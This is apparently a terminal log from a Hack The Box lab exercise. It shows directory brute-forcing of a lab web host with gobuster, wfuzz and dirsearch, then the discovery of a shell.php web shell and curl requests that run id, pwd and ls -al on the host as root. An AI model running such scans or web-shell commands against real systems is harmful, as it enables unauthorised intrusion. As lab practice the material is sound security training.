  2687.          </div>
  2688.  
  2689.          
  2690.          <div class="cf-column">
  2691.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  2692.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  2693.          </div>
  2694.          
  2695.        </div>
  2696.      </div><!-- /.section -->
  2697.  
  2698.      <div class="cf-error-footer cf-wrapper">
  2699.  <p>
  2700.    <span class="cf-footer-item">ClownWare Ray ID: <strong>b6690300803a2688
  2701. </strong></span>
  2702.    <span class="cf-footer-separator">•</span>
  2703.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  2704.    <span class="cf-footer-separator">•</span>
  2705.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  2706.    
  2707.  </p>
  2708. </div><!-- /.error-footer -->
  2709.  
  2710.  
  2711.    </div><!-- /#cf-error-details -->
  2712.  </div><!-- /#cf-wrapper -->
  2713.  
  2714.  <script type="text/javascript">
  2715.  window._cf_translation = {};
  2716.  
  2717.  
  2718. </script>
  2719.  
  2720.  
  2721.  
  2722. * Closing connection 0
  2723. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2724. root@kali:~/HTB/FluJab# gobuster -k -fw -u https://custoomercare.megabank.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,txt,htm,html,phtml,js,zip,rar,tar
  2725.  
  2726. =====================================================
  2727. Gobuster v2.0.0              OJ Reeves (@TheColonial)
  2728. =====================================================
  2729. [+] Mode         : dir
  2730. [+] Url/Domain   : https://custoomercare.megabank.htb/
  2731. [+] Threads      : 10
  2732. [+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
  2733. [+] Status codes : 200,204,301,302,307,403
  2734. [+] Expanded     : true
  2735. [+] Timeout      : 10s
  2736. =====================================================
  2737. 2018/12/31 17:24:58 Starting gobuster
  2738. =====================================================
  2739. 2018/12/31 17:24:59 [-] Wildcard response found: https://custoomercare.megabank.htb/70573970-1eae-407d-97fd-1db5734270bd => 301
  3078. ^C
  3079. [!] Keyboard interrupt detected, terminating.
  3080. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/viewforum: context canceled
  3081. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/forms: context canceled
  3082. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/dot: context canceled
  3083. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/affiliates: context canceled
  3084. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/uk: context canceled
  3085. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/corporate: context canceled
  3086. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/privacypolicy: context canceled
  3087. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/42: context canceled
  3088. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/sponsors: context canceled
  3089. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/testimonials: context canceled
  3090. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/donate: context canceled
  3091. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/flash: context canceled
  3092. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/upload: context canceled
  3093. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/node: context canceled
  3094. =====================================================
  3095. 2018/12/31 17:25:07 Finished
  3096. =====================================================
  3097. root@kali:~/HTB/FluJab# wfuzz -X GET -c --hc 301 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://custoomercare.megabank.htb/FUZZ.php
  3098.  
  3099. Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
  3100.  
  3101. ********************************************************
  3102. * Wfuzz 2.3.1 - The Web Fuzzer                         *
  3103. ********************************************************
  3104.  
  3105. Target: http://custoomercare.megabank.htb/FUZZ.php
  3106. Total requests: 220560
  3107.  
  3108. ==================================================================
  3109. ID   Response   Lines      Word         Chars          Payload    
  3110. ==================================================================
  3111.  
  3112.  
  3113. Total time: 390.3030
  3114. Processed Requests: 220560
  3115. Filtered Requests: 220560
  3116. Requests/sec.: 565.0993
  3117.  
  3118. root@kali:~/HTB/FluJab#
  3119.  
  3120. root@kali:~/HTB/FluJab# dirsearch -u https://custoomercare.megabank.htb -e php,txt,htm,html
  3121.  
  3122.  _|. _ _  _  _  _ _|_    v0.3.8
  3123. (_||| _) (/_(_|| (_| )
  3124.  
  3125. Extensions: php, txt, htm, html | Threads: 10 | Wordlist size: 7020
  3126.  
  3127. Error Log: /opt/dirsearch/logs/errors-18-12-31_17-36-24.log
  3128.  
  3129. Target: https://custoomercare.megabank.htb
  3130.  
  3131. [17:36:24] Starting:
  3132. [17:36:24] 400 -  166B  - /%2e%2e/google.com
  3133. [17:36:37] 200 -  521B  - /index.php
  3134. [17:36:42] 200 -   49B  - /shell.php
  3135.  
Task Completed
root@kali:~/HTB/FluJab# curl -k -v https://custoomercare.megabank.htb/shell.php
*   Trying 10.10.10.144...
* TCP_NODELAY set
* Connected to custoomercare.megabank.htb (10.10.10.144) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: none
  CApath: /etc/ssl/certs
* (304) (OUT), TLS handshake, Client hello (1):
* (304) (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server accepted to use http/1.1
* Server certificate:
*  subject: CN=ClownWare.htb; ST=LON; C=UK; emailAddress=bozo@clownware.htb; O=ClownWare Ltd; OU=ClownWare Protection Services
*  start date: Nov 28 14:57:03 2018 GMT
*  expire date: Nov 27 14:57:03 2023 GMT
*  issuer: CN=ClownWare Certificate Authority; ST=LON; C=UK; emailAddress=bozo@clownware.htb; O=ClownWare Ltd.; OU=ClownWare Protection Services
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> GET /shell.php HTTP/1.1
> Host: custoomercare.megabank.htb
> User-Agent: curl/7.61.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 20 Dec 2018 00:55:45 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Server: ClownWare Proxy
<

<!--
53cret 5shell
shell.php?cmd=[commands]
-->
* Connection #0 to host custoomercare.megabank.htb left intact
root@kali:~/HTB/FluJab#
root@kali:~/HTB/FluJab# curl -k -X GET https://custoomercare.megabank.htb/shell.php -d 'cmd=id'

<!--
53cret 5shell
shell.php?cmd=[commands]
-->
root@kali:~/HTB/FluJab# curl -k -X GET https://custoomercare.megabank.htb/shell.php -p 'cmd=id'

<!--
53cret 5shell
shell.php?cmd=[commands]
-->
curl: (6) Could not resolve host: cmd=id
root@kali:~/HTB/FluJab# curl -k -X GET "https://custoomercare.megabank.htb/shell.php?cmd=id"
<!DOCTYPE html>
<html>
    <head>
        <title>MASTERHACKERZ ONLY!!</title>
        <style type="text/css">
       body {
        background-color: #000;
        color: green;
        text-indent: 50px;
        font-size: 1.5em;
       }

       img {
              width: 55%;
              height: auto;
       }

    </style>
<body>
<pre>
<center>
<H2>5up3r 1337 r00t 9r1v 5h311 v1.0.3b</H2>Use: /shell.php?cmd=[commands]
--------------------------------------------------------------

uid=0(root) gid=0(root) groups=0(root)

</center>
</pre>
</body>root@kali:~/HTB/FluJab# curl -k -X GET "https://custoomercare.megabank.htb/shell.php?cmd=pwd"
<!DOCTYPE html>
<html>
    <head>
        <title>MASTERHACKERZ ONLY!!</title>
        <style type="text/css">
       body {
        background-color: #000;
        color: green;
        text-indent: 50px;
        font-size: 1.5em;
       }

       img {
              width: 55%;
              height: auto;
       }

    </style>
<body>
<pre>
<center>
<H2>5up3r 1337 r00t 9r1v 5h311 v1.0.3b</H2>Use: /shell.php?cmd=[commands]
--------------------------------------------------------------

/root

</center>
</pre>
</body>root@kali:~/HTB/FluJab# curl -k -X GET "https://custoomercare.megabank.htb/shell.php?cmd=ls -al"
<!DOCTYPE html>
<html>
    <head>
        <title>MASTERHACKERZ ONLY!!</title>
        <style type="text/css">
       body {
        background-color: #000;
        color: green;
        text-indent: 50px;
        font-size: 1.5em;
       }

       img {
              width: 55%;
              height: auto;
       }

    </style>
<body>
<pre>
<center>
<H2>5up3r 1337 r00t 9r1v 5h311 v1.0.3b</H2>Use: /shell.php?cmd=[commands]
--------------------------------------------------------------

</center>
    total 56
    drwx------  6 root root 4096 Dec  2 00:04 .
    drwxr-xr-x 23 root root 4096 Nov 28 01:22 ..
    -rw-r--r--  1 root root  597 Nov 28 01:46 .bashrc
    drwx------  2 root root 4096 Dec  1 21:46 .cache
    drwxrwxrwx  2 root root 4096 Nov 27 16:56 .config
    -rw-------  1 root root  403 Dec  2 00:04 .mysql_history
    drwxr-xr-x  2 root root 4096 Nov 27 13:52 .nano
    -rw-r--r--  1 root root  148 Aug 17  2015 .profile
    -r--------  1 root root   34 Nov 28 01:45 root.txt
    -rw-r--r--  1 root root   66 Nov 27 21:18 .selected_editor
    drwxr-xr-x  2 root root 4096 Nov 27 13:57 .ssh
    -rw-r--r--  1 root root  173 Nov 28 01:06 .wget-hsts
    -rw-------  1 root root   52 Nov 27 13:57 .Xauthority


</center>
</pre>
</body>root@kali:~/HTB/FluJab#